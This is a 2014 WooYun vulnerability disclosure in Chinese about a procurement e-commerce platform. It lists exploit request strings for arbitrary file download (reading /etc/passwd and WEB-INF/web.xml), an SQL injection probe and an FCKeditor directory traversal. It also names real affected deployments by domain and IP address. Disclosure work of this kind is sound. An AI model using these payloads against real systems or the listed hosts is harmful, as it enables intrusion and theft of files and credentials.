某物质采购供应管理信息系统多处漏洞

漏洞详情

披露状态:

2014-01-06: 细节已通知厂商并且等待厂商处理中
2014-01-11: 厂商已经确认,细节仅向厂商公开
2014-01-14: 细节向第三方安全合作伙伴开放
2014-01-21: 细节向核心白帽子及相关领域专家公开
2014-01-31: 细节向普通白帽子公开
2014-02-20: 细节向实习白帽子公开
2014-04-06: 细节向公众公开

简要描述:

北京某科技有限公司开发的一个关于物质采购供应的电子商务平台系统,存在多处漏洞。
之前提交过一个类似的,不过提交的是甲方,后来发现有问题的不止那一家,所以现在再提交一次,只当是刷rank吧。

详细说明:

1.任意文件下载漏洞:

~/b2b/web/fileuploadAction.do?method=downLoad&fileName=web.xml&fileType=text&fjbh=web&fjml=/WEB-INF/

~/PortletfileuploadAction.do?method=downLoad&fileName=web.xml&fileType=text&fjbh=web&fjml=/WEB-INF/

~/b2b/web/uploadAction.do?method=downLoad&fileType=text&fileName=/etc/passwd

2.SQL注射漏洞:

~/b2b/web/indexinfoAction.do?actionType=showNewProductDetail&xxbh=xxoo' and 1=1--

看了某一个的源码(应该大家都差不多吧),参数是简单地用safeString处理了:

public static String safeString(String str)
{
if (str == null) {
return "";
}
str = str.trim();
return str;
}



所以程序应该会存在多处注入吧,没有一一测试。

3.FCKeditor漏洞

该系统使用了FCKeditor,部分使用的是低版本的FCKeditor,可以跨目录上传任意文件。

~/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/../../

4.更多信息请参考

WooYun: 中国铁建股份有限公司某业务系统漏洞(多漏洞打包)

漏洞证明:

google一下,发现好几家企业中了枪:

中国中煤能源集团有限公司物资采购电子商务网:http://cg.chinacoal.com:7002

神华神东电力有限责任公司电子商务平台:http://wzcg.shendongpower.com.cn

中国水利水电建设股份有限公司设备物资管理信息系统:http://218.28.177.28

中石油下属的几个:

http://218.97.217.115

http://222.83.251.40

http://111.11.144.1

...

1.jpg



2.jpg



3.jpg



修复方案:

NULL

版权声明:转载请注明来源 鶆鶈@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2014-01-11 10:12

厂商回复:

最新状态:

暂无


漏洞评价: